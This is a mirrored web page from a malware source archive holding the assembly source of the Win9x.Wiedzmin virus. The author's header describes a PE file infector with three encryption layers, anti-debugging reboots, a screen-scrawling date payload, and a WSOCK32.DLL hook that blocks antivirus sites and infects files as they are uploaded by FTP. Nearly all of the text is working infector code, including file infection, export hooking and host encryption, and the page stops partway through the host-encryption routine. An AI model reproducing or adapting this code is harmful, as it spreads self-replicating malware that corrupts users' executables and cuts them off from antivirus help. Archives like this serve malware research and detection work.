Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00
Code Releases Activity
e7e8be9c06
vxug-MalwareSourceCode/LegacyWindows/Win9x.Wiedzmin.asm
vxunderground cb8e4ddb00
Add files via upload
2020-10-09 21:54:36 -05:00

2405 lines
53 KiB
NASM
Raw Blame History

;
; W D nnn
; WW Ww o D M O Nn nn
; Ww wW i eEeE dddDD ZzzZzZ Mm m m nN nn
; wW Ww ii e E d dD Zz m M M mm ii N n n
; Ww w wW ii Eeee d dD z mm m m i n N n
; W W W W ii e d dD z m mm ii n n n
; wWw wWwW iii eEee d dD zZzZzZ mm mm ii n nn
; ddddDd mm iii n n
;
; ã(c) YuP - Deithwen Addan - Artist of Rebelionã
; ã yup@tlen.pl ã
;
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Ä w9x.Wiedzmin Ä
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;
;
; ÄÄÄÄÄÄÄÄÄÄÄ
; <20>ÄDISCLAIMERÄ<52>
; ÄÄÄÄÄÄÄÄÄÄÄ
; This is a source of a virus, only source the compiled version
; cannot leave your computer! Author is NOT RESPONSIBLE FOR ANY
; ACTIONS WITH THIS CODE!
;
;
;
; ÄÄÄÄÄÄÄÄÄÄÄÄ
; <20>Ä The name Ä<>
; ÄÄÄÄÄÄÄÄÄÄÄÄ
;
; The name 'Wiedzmin' was stolen from Andrzej Sapkowski saga "Wiedzmin".
; (sapkowski.pl,sapkowski.cz) - someone said that he is another
; Tolkien (in my opinion this book is even better then Tolkienz
; "Lord of the Rings").
; Wiedzmin was a some kind of mutant (only few kids from 10 can survive
; wiedzmin test). As a mutant he was very fast, he was master of fencig,
; he can see at night, and he of course can make magic signs.
; Blah ...
; Next he went, and travel around the world (he was killing monsterz for money).
; In his journey he met new fantasic characters like Regis (vapire),
; Milva (hunter), Jaskier (bard), Yennefer (witch) , Ciri (child of destinty)
; ...
;
; The book is realy FANTASTIC! Full of adventures, fight, sex (X-D),
; blood, swearwords, and much much more! I realy advice you to READ IT!
; (check translationz for your language: www.sapkowski.pl).
; If you like fantasy you CAN'T miss IT!
;
;
; ÄÄÄÄÄÄÄÄÄÄÄÄ
; <20>Ä Music Ä<>
; ÄÄÄÄÄÄÄÄÄÄÄÄ
;
; I'd like to thx some kewl music groups in range of rock-hiphop:
; Outsidez: Polish groupz:
; æDeep Purple æMolesta
; æIron Maiden æFenomen
; æLinkin Park æZipera
; æRage Against the Machine æGrammatik
; æKoRn æEldo
; æLimp Bizkit æKaliber 44
;
; I'm a weird person ;]
;
;
; ÄÄÄÄÄÄÄÄÄÄÄÄ
; <20>Ä Greetz Ä<>
; ÄÄÄÄÄÄÄÄÄÄÄÄ
;
; Greetz go to:
; æFriendz from city:
; ŸYoo (:])
; ŸMisiek (dzienx za plyty stary)
; ŸKlosina (nie rzucaj nozami)
; ŸStra¿ Miejska (nie trzymamy nog na lawkach :p)
; ŸI dla reszty ludkuf, nie wymienialem was bo i tak
; nigdy tego nie przeczytacie.
;
; æGuyz from Undernet:
; ŸToro (busy today?)
; ŸSlageHammer (helo tester ;D)
; ŸSpanska (BloodHound.W32.WSWORM ;[)
; ¿BFF70000h (lagz lagz lagz)
;
; æGuyz from irc.pl:
; ŸBlaze (stuk puk)
; ŸDetergent (walek)
; ŸShmastah (judeIRC ;])
; ŸAjron (ten nie prawdziwy :P)
; ŸAamf-girl (gimnazjalistka ;P)
; ŸWizja (dolly ma reumatyzm czy jakos tak ;>)
; ŸPafko (dragonball rulez!)
; ŸCrash (why you? ;P)
;
;
; ÄÄÄÄÄÄÄÄÄÄÄÄ
; <20>Ä Briefing Ä<>
; ÄÄÄÄÄÄÄÄÄÄÄÄ
;
; Virus name : w9x.Wiedzmin
; Virus version : 1.0
; Virus author : Lord YuP - Deithwen Addan
; Release date : 6.02.02+8.02.02 i forgot to install SEH, he he
; Virus type : PE infector and WSOCK32.DLL hooker
; Target Systems : win95<nt>, win98<nt>, winME<t>
; †[nt] - not tested (should work, if not fuck it!)
; †[t] - tested
;
;
; Encryption : 3 LAYERS CRYPTED BY RANDOM NUMBER!
; † 1 - cryptz main virus body †
; † 2 - cryptz host body †
; † 3 - cryptz virus data †
;
; Every layer is crypted by another key.
;
; Virus helper : Virus when found section called different
; then ".text" or "CODE" (EIP must point to
; it) it is gonna to crypt all file body
; and put only decryptor into last section.
; The main body (with other virus probably)
; is crypted by random key. EIP points to
; decryptor.
;
;
;
; Polymorphic : Yep random key crypting, adding
; 90h<NOP> garbage in the range
; of 0-255.
;
;
; AntiAV : Virus wouldn't infect filez
; with 'a','A','E','e','v','V'
; at start.
;
;
; AntiDEBUG : Yep, using win9x Softice detection,
; and IsDebuggerPresent API. When
; sice is found it shows message in
; debbuger and exec int 19h !
; Other debbugers like td32, SoftSnoop
; end so on = int 19h!
;
;
; WSOCK32 hooker : Virus infect wsock32.dll replacing the
; send, connect function addressez.
; After reboot (wininit.ini ;P) functionz
; will be hooked. User will never connect
; to AV sitez (error: host not found),
; and when user will try to put a file in
; the FTP account, virus will infect it on
; fly.
;
;
;
; Infection procez : Virus infect 7 filez in the local
; directory and 7 filez in the windowz
; directory. Virus is going to apend
; itself to the last section. The section
; is increased. EIP points to it.
;
;
;
; Payload : On 22.06 or 22.12 every run it gonna
; print color string in the infinite
; loop. The string will be VISIBLE
; everywhere - virus grabz active
; window HDC!
;
;
;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WIEDZMIN.ASM]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
.386
.model flat
jumps
locals
extrn ExitProcess:PROC
extrn MessageBoxA:PROC
FILETIME STRUC
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struc ;FIND DATA
dwFileAttributes dd 0
dwLowDateTime0 dd ?
dwHigDateTime0 dd ?
dwLowDateTime1 dd ?
dwHigDateTime1 dd ?
dwLowDateTime2 dd ?
dwHigDateTime2 dd ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved dd 0,0
cFileName db 260 dup(0)
cAlternateFilename db 14 dup(0)
db 2 dup(0)
WIN32_FIND_DATA ends
hooksize equ hook_end-start_h
sendh equ (offset hooked_send-offset start_h)
connecth equ (offset hooked_connect-offset start_h)
vvsize equ HeapEnd-HeapStart
virussize equ VirusEnd-v_start
allsize equ virussize
TO_DE equ @loop_decryptt-@to_this
helper equ @helper_end-@uncrypt
virussizee macro
db virussize/10000 mod 10 + "0"
db virussize/01000 mod 10 + "0"
db virussize/00100 mod 10 + "0"
db virussize/00010 mod 10 + "0"
db virussize/00001 mod 10 + "0"
endm
.DATA
db ?
.CODE
v_start:
pushad
pushfd
call @delta
@delta:
pop ebp ;ebp contains address of @delta right now in
sub ebp,offset @delta ;memory -> we must sub the linking @delta val
cmp ebp,0
je @_KERNEL
@main_decryptor:
lea edx,[ebp+offset @to_this]
mov eax,[ebp+key_main]
mov ecx,TO_DE
@loop_decrypt:
xor byte ptr [edx],al
inc edx
loop @loop_decrypt
cmp edi,'!PUY'
jne @to_this
ret
@to_this:
lea edi,[ebp+offset APIList]
lea esi,[ebp+offset APIList]
call @UN_CRYPT_BYTEZ
lea edi,[ebp+offset TO_CRYPT_DATA]
lea esi,[ebp+offset TO_CRYPT_DATA]
call @UN_CRYPT_BYTEZ
@_KERNEL:
lea eax, [ebp+fault] ; Setup a SEH frame
push eax
push dword ptr fs:[0]
mov fs:[0], esp
mov eax,0BFF70000h ;kerneloz w95
cmp word ptr [eax],'ZM'
je _GOT_KERNEL
;NT moze pozniej :p
mov eax,0BFF60000h ;ladujemy kernela ;) winME ;)
cmp word ptr [eax],'ZM' ;check is it a exe file
je _GOT_KERNEL
jmp @EXIT
_GOT_KERNEL:
mov dword ptr [ebp+capis],5h
mov dword ptr [ebp+Kernel],eax
@go_export:
mov dword ptr [ebp+NON],000000h
mov dword ptr [ebp + AOF],000000h
mov dword ptr [ebp + AON],000000h
mov dword ptr [ebp + AOO],000000h
mov edx,eax
mov ebx,edx
mov edi, [eax + 03ch] ;a valid PE ?
add edx, edi
cmp dword ptr [edx],'EP'
jne @EXIT
mov edx,[edx + 078h] ;export table
add edx,eax ;mamy w edx -> export table
mov esi,[edx + 018h]
mov dword ptr [ebp + NON],esi
mov esi,[edx+1Ch]
mov dword ptr [ebp + AOF],esi
add dword ptr [ebp + AOF],eax
mov esi,[edx+20h]
mov dword ptr [ebp + AON],esi
add dword ptr [ebp + AON],eax
mov esi,[edx+24h]
mov dword ptr [ebp + AOO],esi
add dword ptr [ebp + AOO],eax
@export_read:
mov esi,dword ptr [ebp + AON]
mov [ebp+offset IndexA],esi ;save into naming index
mov esi,dword ptr [esi]
add esi,eax
xor ebx,ebx
@__GPA:
cmp dword ptr [ebp+capis],5h
je @zwykle
lea edi,[ebp+offset A1]
mov ecx,A1s
cmp dword ptr [ebp+capis],1
jne @porownaj
lea edi,[ebp+offset A2]
mov ecx,A2s
jmp @porownaj
@zwykle:
lea edi,[ebp + offset APIS] ;mam offset zmiennej
@GET_GPA:
mov ecx,APIS_SIZE ;size api
@porownaj:
rep cmpsb ;scan
je found ;if equal calculate function address
Scan_dalej:
add dword ptr [ebp + offset IndexA],4
mov esi,[ebp + offset IndexA]
mov esi,[esi]
add esi,eax
cmp dword ptr [ebp+offset NON],ebx
je @EXIT
inc ebx
cmp dword ptr [ebp+offset NON],ebx
je @EXIT
jmp @__GPA
found:
mov eax,ebx ;mamy GPA !!!
mov ecx,edi
inc ecx
push ecx ;na stos ;P
mov eax,ebx ;EAX=>counter
mov ecx,2
mul ecx ;mnozymy EAX*2
pop ecx ;zdejmujemy ze stosu ECX
mov esi,[ebp + AOO]
add esi,eax
xor eax,eax
mov ax,word ptr [esi]
mov ecx,4
mul ecx
cmp dword ptr [ebp+go_wsock],1
jne @skip_it_urgh
mov esi,[ebp + AOF]
add esi,eax
mov eax,[esi]
cmp dword ptr [ebp+capis],1
je @make_1
;mov ebx,dword ptr [ebp+wsock_hh]
;mov dword ptr [ebp+a_send],eax
;add dword ptr [ebp+a_send],ebx
;mov eax,dword ptr [ebp+a_send]
mov ebx,sendh
mov edx,dword ptr [ebp+moj_address] ;tricky shit ;]
add edx,ebx
jmp make_real
@make_1:
mov ebx,connecth
mov edx,dword ptr [ebp+moj_address] ;tricky shit ;]
add edx,ebx
make_real:
mov [esi],edx
inc dword ptr [ebp+capis]
cmp dword ptr [ebp+capis],2
je @go_out_now
mov eax,dword ptr [ebp+wsock_h]
jmp @go_export
@go_out_now: ret
@skip_it_urgh:
mov esi,[ebp + AOF]
add esi,eax
mov edi,dword ptr [esi]
add edi,[ebp+offset Kernel]
mov eax,edi
mov dword ptr [ebp+_GPA],eax
@GET_APIS: ;API Search
xor esi,esi
lea esi,[ebp+offset APIList]
lea edi,[ebp+offset _FindFirstFileA]
;mamy d wordy czyli skok co 4 bajty
;stosd -> z EAX do EDI
@go_table:
push esi
push dword ptr [ebp+offset Kernel]
call dword ptr [ebp+offset _GPA]
stosd
@next_byte:
inc esi
cmp byte ptr [esi],00h
jne @next_byte
inc esi
cmp byte ptr [esi],07h
jne @go_table
mov eax,dword ptr [ebp+_GetCurrentDirectoryA]
mov dword ptr [ebp+gcd],eax
mov eax,dword ptr [ebp+_WinExec]
mov dword ptr [ebp+wex],eax
lea eax,[ebp+offset wsock]
inc eax
push eax
call dword ptr [ebp+_LoadLibraryA]
mov dword ptr [ebp+wsock_hh],eax
lea ecx,[ebp+offset sle]
push ecx
push eax
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+_WSASetLastError],eax
lea ecx,[ebp+offset A1]
push ecx
push dword ptr [ebp+wsock_hh]
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+a_send],eax
lea ecx,[ebp+offset A2]
push ecx
push dword ptr [ebp+wsock_hh]
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+a_connect],eax
push 4h ; PAGE_READWRITE
push 1000h ; MEM_COMMIT
push 1000 ; size of buffer
push 0 ; lpAddress
call dword ptr [ebp+_VirtualAlloc] ; Alloc IT!
mov dword ptr [ebp+vbuf],eax
;********************************DEBUG TRAP******************************************************
;call @debug_trap
;************************************************************************************************
call @wsockz
mov dword ptr [ebp+go_wsock],0
lea eax,[ebp+SYSTEM_TIME]
push eax
call dword ptr [ebp+_GetSystemTime]
cmp word ptr [ebp+wMonth],6 ;22.06 Midaëte
jne try_
cmp word ptr [ebp+wDay],22
jne try_
call make_it_real
try_:
cmp word ptr [ebp+wMonth],12 ;22.12 Midinvaerne
jne cya_folx
cmp word ptr [ebp+wDay],22
jne cya_folx
call make_it_real
cya_folx:
call @GGEN_KEY
lea edi,[ebp+offset APIList]
lea esi,[ebp+offset APIList]
call @CRYPT_BYTEZ
lea edi,[ebp+offset TO_CRYPT_DATA]
lea esi,[ebp+offset TO_CRYPT_DATA]
call @CRYPT_BYTEZ
_done:
lea edi,[ebp+finddata.cFileName]
call dword ptr [ebp+_GetCommandLineA]
mov esi,eax
xor ebx,ebx
_skip_space:
lodsb
cmp al,0
je @GetWDir
cmp al,' '
je _ave_it
jmp _skip_space
_ave_it:
lodsb
inc ebx
cmp al,0
je @infect_shit
stosb
jmp _ave_it
@infect_shit:
cmp ebx,4
jl @GetWDir
lea esi,[ebp+offset finddata.cFileName]
add esi,ebx
sub esi,5
lodsb
cmp al,'.'
je yep_it
jmp @GetWDir
yep_it:
push dword ptr [ebp+key_main]
push dword ptr [ebp+key_next]
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]
push 0h
call dword ptr [ebp+_ExitProcess]
@GetWDir:
lea eax,[ebp+offset winDIR]
push 260
push eax
call dword ptr [ebp+_GetWindowsDirectoryA]
;now local dir
lea eax,[ebp+offset oldDIR]
push eax
push 560
call dword ptr [ebp+_GetCurrentDirectoryA]
mov dword ptr [ebp+was_win],0000000h
@Find1st:
mov dword ptr [ebp+ic],0000000h
lea eax,[ebp+offset finddata]
push eax
lea eax,[ebp+offset marker]
push eax
call dword ptr [ebp+_FindFirstFileA]
mov dword ptr [ebp+sHnd],eax
inc eax
jz @d_dalej
@workk:
push dword ptr [ebp+key_main]
push dword ptr [ebp+key_next]
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]
@@Fnext:
lea eax,[ebp+offset finddata]
push eax
push dword ptr [ebp+offset sHnd]
call dword ptr [ebp+_FindNextFileA]
cmp eax,0
je @d_dalej
push dword ptr [ebp+key_main]
push dword ptr [ebp+key_next]
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]
cmp dword ptr [ebp+ic],7
jne @@Fnext
@d_dalej:
cmp dword ptr [ebp+was_win],0
jne @dalej
_WinINF:
cmp dword ptr [ebp+was_win],0
jne _stepnext
lea eax,[ebp+offset winDIR]
push eax
call dword ptr [ebp+_SetCurrentDirectoryA]
mov dword ptr [ebp+ic],0000000h
mov dword ptr [ebp+was_win],1
push dword ptr [ebp+sHnd]
call dword ptr [ebp+_FindClose]
_stepnext:
cmp dword ptr [ebp+ic],7
jne @Find1st
@dalej:
lea eax,[ebp+offset oldDIR]
push eax
call dword ptr [ebp+_SetCurrentDirectoryA]
jmp @EXIT
fault:
mov esp, [esp+8]
@EXIT:
push 4000h
push 1000
push dword ptr [ebp+vbuf]
call dword ptr [ebp+_VirtualFree]
pop dword ptr fs:[0]
add esp, 4
cmp ebp,0 ;first GeneratioN?
jne _ETH ;tak to wyjc ;]
call fakehost
_ETH:
call @uncrypt
popfd
popad
call @gd
@gd: pop ebp
sub ebp,offset @gd
mov eax,dword ptr [ebp+hosteip]
add eax,dword ptr [ebp+imagebase]
jmp eax
Kernel dd 0
;<##############################################################################################>
;------------------------------------------------------------------------------------------------
;************************************************************************************************
;INFECT EM GLOWZ !!!!
;************************************************************************************************
;------------------------------------------------------------------------------------------------
;<##############################################################################################>
@infect:
call @bad_name
cmp edi,1
jne _continue
ret
@infect0:
_continue:
lea esi,[ebp+offset finddata.cFileName]
push esi
call dword ptr [ebp+_GetFileAttributesA]
mov dword ptr [ebp+fileAtrib],eax
inc eax
jz _Out
lea eax,[ebp+F1]
push eax
lea eax,[ebp+F2]
push eax
lea eax,[ebp+F3]
push eax
push dword ptr [ebp+fHnd]
call dword ptr [ebp+_GetFileTime]
push 00000080h
push esi
call dword ptr [_SetFileAttributesA+ebp] ; clean file
cmp eax,0
je _Out
;mov ecx,dword ptr [ebp+finddata.nFileSizeLow]
;mov [ebp+offset memory],ecx
;Ble otfieramy zeby miec handle
xor eax,eax
lea esi,[ebp+offset finddata.cFileName]
push eax
push 00000080h
push 00000003h
push eax
push eax
push 80000000h OR 40000000h
push esi
call dword ptr [ebp+_CreateFileA]
mov edi,eax ;w edi handle
inc eax
jz _Out
dec eax
mov dword ptr [ebp+offset fileHandle],eax
_Oblicz:
push 0
push dword ptr [ebp+offset fileHandle]
call dword ptr [ebp+_GetFileSize]
mov dword ptr [ebp+fSize],eax
inc eax
jz _Out2
dec eax
mov dword ptr [ebp+finddata.nFileSizeLow],eax
mov ecx,dword ptr [ebp+fSize]
call MapF
mov ecx,dword ptr [ebp+fSize]
call VMapF
;w esi mamy maping tak jak z kernelem
_Check_PE:
cmp word ptr [esi],'ZM'
jne _Out3
mov ecx,[esi+3ch]
cmp dword ptr [esi+ecx],'EP'
jne _Out3
add esi,ecx ;ESI => PE HEADER
mov edi,esi
_Saving:
mov dword ptr [ebp+header],esi
mov ecx,[esi+28h]
mov dword ptr [ebp+hosteip],ecx
mov ecx,[esi+3ch]
mov dword ptr [ebp+align],ecx
mov ecx,[esi+34h]
mov dword ptr [ebp+imagebase],ecx
mov ecx,[esi+38h] ;get section align value
mov [ebp + _secAlign],ecx ;and save it
_Infecto0:
cmp dword ptr [esi+4ch],"deiW"
jz _No_infect
push dword ptr [esi+3Ch]
;***********************************************************************************************
mov eax,[ebp+offset fMapReal]
push eax
mov eax, [ebp+_UnmapViewOfFile]
call eax
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_CloseHandle]
;mov eax,dword ptr [ebp+go_wsock]
mov eax,dword ptr [ebp+fSize] ; And Map all again.
cmp dword ptr [ebp+go_wsock],1
je @dodaj
add eax,virussize+vvsize
;add eax,vvsize
jmp @nextt
@dodaj:add eax,hooksize
@nextt:
pop ecx
call Align_
mov dword ptr [ebp+memory],eax
mov ecx,eax
call MapF
mov ecx,dword ptr [ebp+memory]
call VMapF
cmp dword ptr [ebp+go_wsock],1
je @0dal
call @crypt_host
cmp dword ptr [ebp+help_virus],1
je _God
@0dal:
mov esi,[eax+3ch]
add esi,eax ;ESI => PE HEADER
mov edi,esi
;************************************************************************************************
inc dword ptr [ebp+ic]
xor eax,eax
mov ax,[esi + 06h] ;load number of sections
mov ecx,28h ;28 bytes for each section header
dec eax ;seeking for last,...
mul ecx ;and mul it
add esi,eax ; Normalize
add esi,78h ; Ptr to dir table
mov edx,[edi+74h] ; EDX = n§ of dir entries
shl edx,3 ; EDX = EDX*8
add esi,edx ; ESI = Ptr to last section
mov edx,[esi+10h] ; EDX = SizeOfRawData
mov ebx,edx ; EBX = EDX
add edx,[esi+14h] ; EDX = EDX+PointerToRawData
push edx ; Preserve EDX
mov eax,ebx ; EAX = EBX
add eax,[esi+0Ch] ; EAX = EAX+VA Address
; EAX = New EIP
;mov [edi+28h],eax ; Change the new EIP
mov dword ptr [ebp+NewEIP],eax ; Also store it
cmp dword ptr [ebp+go_wsock],1
je @infect_then
mov eax,dword ptr [ebp+NewEIP]
mov [edi+28h],eax
@infect_then:
mov eax,[esi+10h] ; EAX = new SizeOfRawData
cmp dword ptr [ebp+go_wsock],1
je @dallejj
add eax,vvsize+virussize ; EAX = EAX+VirusSize
jmp @nexttt
@dallejj: add eax,hooksize
@nexttt:
mov ecx,[edi+3Ch] ; ECX = FileAlignment
call Align_ ; Align!
mov [esi+10h],eax ; New SizeOfRawData
mov [esi+08h],eax ; New VirtualSize
pop edx ; EDX = Raw pointer to the
; end of section
cmp dword ptr [ebp+go_wsock],1
je @skip_thiss
mov eax,[esi+10h] ; EAX = New SizeOfRawData
add eax,[esi+0Ch] ; EAX = EAX+VirtualAddress
mov [edi+50h],eax ; EAX = New SizeOfImage
@skip_thiss:
or dword ptr [esi+24h],0A0000020h
mov dword ptr [edi+4ch],"deiW" ;Wiedzmin here ;)
lea esi,[ebp+v_start] ; ESI = Ptr to virus_start
xchg edi,edx ; EDI = Raw ptr after last
mov dword ptr [ebp+moj_address],edi
; section
add edi,dword ptr [ebp+fMapReal] ;EDI = Normalized ptr
mov ecx,virussize ;ECX = Size to copy
cmp dword ptr [ebp+go_wsock],1
jne @write_it
mov ecx,hooksize
lea esi,[ebp+start_h]
@write_it:
cmp dword ptr [ebp+go_wsock],1
je step_0
call @crypt_my_body
jmp step_1
step_0: rep movsb ;Do it!
step_1:
cmp dword ptr [ebp+go_wsock],1
jne _Git
ret
_Git:
jmp _God
_No_infect:
cmp dword ptr [ebp+go_wsock],1
jne @zw
mov edx,-1
jmp _God
@zw:
mov ecx,dword ptr [ebp+finddata.nFileSizeLow]
call @zostaf
dec dword ptr [ebp+ic]
_God:
mov eax,[ebp+offset fMapReal]
push eax
mov eax, [ebp+_UnmapViewOfFile]
call eax
_Out3:
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_CloseHandle]
_Out2:
lea eax,[ebp+F1]
push eax
lea eax,[ebp+F2]
push eax
lea eax,[ebp+F3]
push eax
push dword ptr [ebp+fHnd]
call dword ptr [ebp+_SetFileTime]
push dword ptr [ebp+offset fileHandle]
call dword ptr [ebp+_CloseHandle]
cmp dword ptr [ebp+go_wsock],1
je @@@z
push 1
lea eax,[ebp+santa]
push eax
lea eax,[ebp+finddata.cFileName]
push eax
call dword ptr [ebp+_CopyFileA]
@@@z:
;&resetore the attributez
push dword ptr [ebp+fileAtrib]
lea eax,[ebp+finddata.cFileName]
push eax
call dword ptr [ebp+_SetFileAttributesA]
mov edx,-1
_Out:
ret
Align_:
push edx
xor edx,edx
push eax
div ecx
pop eax
sub ecx,edx
add eax,ecx
pop edx
ret
@zostaf:
xor eax,eax
push eax
push eax
push ecx
push dword ptr [ebp+fileHandle]
call dword ptr [ebp+offset _SetFilePointer]
push dword ptr [ebp+fileHandle]
call dword ptr [ebp+offset _SetEndOfFile]
ret
;**************************
;ECX - size to map
;**************************
MapF:
xor eax,eax
push eax
push ecx
push eax
push 00000004h
push eax
push dword ptr [ebp+fileHandle]
call dword ptr [ebp+_CreateFileMappingA]
cmp eax,0
je _Out2
mov dword ptr [ebp+fHndMap],eax
ret
VMapF:
xor eax,eax
push ecx
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_MapViewOfFile]
cmp eax,0
je _Out3
mov dword ptr [ebp+fMapReal],eax
mov esi,eax
ret
@TRY_RELOC:
ret
@debug_trap: ;ret
call dword ptr [ebp+_IsDebuggerPresent]
or eax,eax
jz _leave_me
ble: mov eax, 909119cdh ;int 19h!
jmp $ - 4
_leave_me:
lea eax,[ebp+sice9x]
push 00000000h
push 00000080h
push 00000003h
push 00000000h
push 00000001h
push 0C0000000h
push eax
call dword ptr [ebp+_CreateFileA]
inc eax
jz leave_it
dec eax
push eax
call dword ptr [ebp+_CloseHandle]
lea eax,[ebp+to_ja]
push eax
call dword ptr [ebp+_OutputDebugStringA]
mov eax, 909119cdh ;int 19h!
jmp $ - 4
jmp @EXIT
leave_it: ret
;************************************************************************************************
;PayL0ad ;]
;this is very simple coz i don't have any time to make it perfect
;************************************************************************************************
payload:
p_x dd 0
p_y dd 0
hdc dd 0
wh dd 0
screen_x dd 0
screen_y dd 0
font dd 0
color: dd 15466513
dd 15474944
dd 15484928
dd 15496448
make_it_real:
pay:
lea esi,[ebp+@GDI_APIZ]
lea edi,[ebp+@GDI_APIZA]
lea ebx,[ebp+gdi32]
change_l:
push ebx
call dword ptr [ebp+_LoadLibraryA]
mov ebx,eax
@find_a:
push esi
push ebx
call dword ptr [ebp+_GPA]
stosd
check_a:
inc esi
cmp byte ptr [esi],0
jne check_a
inc esi
cmp byte ptr [esi],77h
je change_ll
cmp byte ptr [esi],69h
je @go_pay
jmp @find_a
change_ll: inc esi
lea ebx,[ebp+user32]
jmp change_l
@go_pay:
push 1
call dword ptr [ebp+_GetSystemMetrics] ;user
mov dword ptr [ebp+screen_y],eax
push 0
call dword ptr [ebp+_GetSystemMetrics] ;user
mov dword ptr [ebp+screen_x],eax
call c_font
lea esi,logo
xor ebx,ebx
l:
call dword ptr [ebp+_GetDesktopWindow] ;user
mov dword ptr [ebp+wh],eax
push dword ptr [ebp+wh]
call dword ptr [ebp+_GetWindowDC] ;user
mov dword ptr [ebp+hdc],eax
call draww
push dword ptr [ebp+hdc]
push dword ptr [ebp+wh]
call dword ptr [ebp+_ReleaseDC] ;user
jmp l
draww:
xor eax,eax
lodsb
lea edi,[ebp+jed]
stosb
cmp al,0
jne @wypisz
lea esi,[ebp+logo]
lodsb
lea edi,[ebp+jed]
stosb
@wypisz:
cmp al,'i'
jne @dik
add dword ptr [ebp+p_x],6
@dik:
push dword ptr [ebp+font]
push dword ptr [ebp+hdc]
call dword ptr [ebp+_SelectObject] ;gdi
push 0
push dword ptr [ebp+hdc]
call dword ptr [ebp+_SetBkMode] ;gdi
mov eax,dword ptr [ebp+color+ebx]
add ebx,4
cmp ebx,4*4
jl @n1
xor ebx,ebx
@n1:
push eax
push dword ptr [ebp+hdc]
call dword ptr [ebp+_SetTextColor] ;gdi
push 1
lea eax,[ebp+jed]
push eax
push dword ptr [ebp+p_y]
push dword ptr [ebp+p_x]
push dword ptr [ebp+hdc]
call dword ptr [ebp+_TextOutA] ;gdi
mov eax,dword ptr [ebp+screen_y]
cmp dword ptr [ebp+p_y],eax
jae chang_g
mov eax,dword ptr [ebp+screen_x]
add dword ptr [ebp+p_x],13
cmp dword ptr [ebp+p_x],eax
jle spp
mov dword ptr [ebp+p_x],0
add dword ptr [ebp+p_y],15
jmp spp
chang_g: mov dword ptr [ebp+p_y],0
spp:
push 50
call dword ptr [ebp+_Sleep]
ret
c_font:
push offset famil
xor eax,eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push 9
push 9
call dword ptr [ebp+_CreateFontA] ;gdi
mov [font],eax
ret
@GDI_APIZ: db "CreateFontA",0
db "TextOutA",0
db "SetBkMode",0
db "SetTextColor",0
db "SelectObject",0
db 77h
db "GetSystemMetrics",0 ;user32 part X-D
db "GetDesktopWindow",0
db "GetWindowDC",0
db "ReleaseDC",0
db 69h
;************************************************************************************************
;Handle this sucker ;]
;************************************************************************************************
@crypt_host:
;push dword ptr [ebp+key_next]
pushad
mov eax,dword ptr [ebp+fMapReal]
mov esi,[eax+3ch]
add esi,eax ;ESI => PE HEADER
mov edi,esi
xor eax,eax
mov ax,[esi + 06h] ;load number of sections
mov ecx,0h ;28 bytes for each section header
add esi,ecx ; Normalize
add esi,78h ; Ptr to dir table
mov edx,[edi+74h] ; EDX = n§ of dir entries
shl edx,3 ; EDX = EDX*8
add esi,edx ; ESI = Ptr to last section
mov ecx,[edi+28h]
search_it:
mov ebx,dword ptr [esi+0ch]
add ebx,dword ptr [esi+08h]
inc eax
cmp ecx,ebx
jb sfound
dec eax
jz @e_error
add esi,28h
jmp search_it
sfound:
test dword ptr [esi+24h],10000000h ;check section atributes
jnz @e_error
or dword ptr [esi+24h],0A0000020h
cmp dword ptr [esi],'xet.'
je _01
cmp dword ptr [esi],'EDOC'
je _01
mov dword ptr [ebp+help_virus],1
_01:
push eax
;STEP GET RAW ADDRESS
mov edx,ecx
sub edx,dword ptr [esi+0ch] ;IMAGEBASE - VIRTUAL RVA=0
add edx,[esi+014h] ;ADD RAW OFFSET
mov dword ptr [ebp+e_where],edx
push edx
mov edx,[esi+010h]
mov dword ptr [ebp+e_bytes],edx
pop edx
add edx,dword ptr [ebp+fMapReal] ;WHERE TO CRYPT!
mov ecx,[esi+10h]
mov dword ptr [ebp+e_god],0
mov dword ptr [ebp+firstk],1h
pushad
lea edi,[ebp+key_next]
call @GGEN_KEY
call @combine_key
mov eax,dword ptr [ebp+key_next]
popad
mov dword ptr [ebp+firstk],0
push esi
mov eax,dword ptr [ebp+key_next]
xor ebx,ebx
@loop_it:
;=> IF 5 BYTES ARE ZEROZ THEN THE DON't CRYPT BELOW
cmp byte ptr [edx],00h
jne @go_
cmp byte ptr [edx+1],00h
jne @go_
cmp byte ptr [edx+2],00h
jne @go_
cmp byte ptr [edx+3],00h
jne @go_
